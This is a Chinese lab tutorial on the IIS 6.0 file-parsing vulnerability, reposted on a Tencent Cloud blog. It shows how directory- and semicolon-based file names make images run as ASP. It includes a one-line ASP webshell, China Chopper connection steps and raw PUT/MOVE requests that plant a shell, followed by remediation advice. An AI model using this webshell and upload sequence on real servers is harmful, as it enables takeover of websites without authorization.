前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >IIS-解析漏洞(上)

IIS-解析漏洞(上)

作者头像
渗透攻击红队
发布2019-11-20 11:20:17
1.1K0
发布2019-11-20 11:20:17
举报
文章被收录于专栏:漏洞知识库漏洞知识库
漏洞知识库

网络安全/渗透测试/代码审计/

关注

IIS - 解析漏洞(上)

漏洞介绍与成因

IIS-6.0这个版本中,搭建的服务器是2003系统中所造成的解析漏洞的两种情况。

代码语言:javascript
复制
情况一:/liuwx.asp/liuwx.jpg

介绍:在网站的根目录下创建一个命名为liuwx.asp的文件夹,该文件夹下有一个liuwx.jpg的图片木马,也就是说该目录下的所有文件都会被当做asp脚本文件

利用:访问 www.liuwx.cn/liuwx.asp/liuwx.jpg 会吧图片解析当成asp脚本文件执行
代码语言:javascript
复制
情况二:`liuwx.asp;.jpg`

介绍:创建一个图片并命名为liuwx.asp;.jpg,注意有一个分号和点,的图片文件

利用:www.liuwx.cn/liuwx.asp/liuwx.asp;.jpg  会吧它当做脚本文件执行

准备工作

代码语言:javascript
复制
虚拟机:Windows Server 2003 Enterprise x64 Edition

物理主机和2003虚拟机必须能相互Ping通

在这里我物理主机的IP是:192.168.1.100

2003虚拟机的IP是:192.168.119.133

漏洞验证

情况一

我首先在网站根目录下创建了一个liuwx.asp的目录,该目录下有一个liuwx.txt文件,里面写了这是情况一

接下来吧.txt修改为.jpg

此时,用物理机访问2003虚拟机的图片地址:

http://192.168.119.133/liuwx.asp/liuwx.jpg

可以看到它并没有显示图片,而是吧图片当做脚本来执行了!为了方便演示,我吧图片内容修改为asp一句话来演示<%execute(request("cmd"))%>

然后用菜刀链接URL:

http://192.168.119.133/liuwx.asp/liuwx.jpg | cmd

这个时候我们就成功得到了一个webshell

情况二

在网站根目录下创建一个命名为liuwx.asp;.jpg的文件,其中和上面的一样,里面写了asp一句话

用菜刀链接URL:

http://192.168.119.133/liuwx.asp;.jpg | cmd

这个时候我们就又成功得到了一个webshell

通过PUT漏洞来利用IIS6.0解析漏洞

关于PUT漏洞可以看我之前写的文章:http://www.liuwx.cn/IIS-1.html

代码语言:javascript
复制
HTTP/1.1 201 Created
Date: Fri, 16 Aug 2019 15:33:02 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: http://192.168.119.133/test.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

服务器验证一下看看存在不存在:

上传成功!

当然,我们上传txt文件并没有什么作用,我们得上传脚本文件才可以发挥作用。

我们上传先用PUT上传一个shell.txt:

上传成功后我们再选择MOVE

切记数据包中一定要加:;.jpg

代码语言:javascript
复制
MOVE /shell.txt HTTP/1.1
Host: 192.168.119.133
Destination: http://192.168.119.133/shell.asp;.jpg

这个时候就成功上传了一个shell.asp;/jpg的文件!

我们使用中国菜刀连接一下Shell:

这个时候就拿到了网站的控制权限!

修复建议

程序方面:

1、对新建目录文件名进行过滤,不允许新建包含.的文件夹

2、取消网站后台新建目录的功能,不允许新建目录

3、限制上传的脚本执行权限,不允许执行脚本

4、过滤.asp/*.jpg,通过ISApi组件过滤

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-09-22,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 漏洞知识库 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞介绍与成因
  • 准备工作
  • 漏洞验证
    • 情况一
      • 情况二
      • 通过PUT漏洞来利用IIS6.0解析漏洞
      • 修复建议
      相关产品与服务
      网站渗透测试
      网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档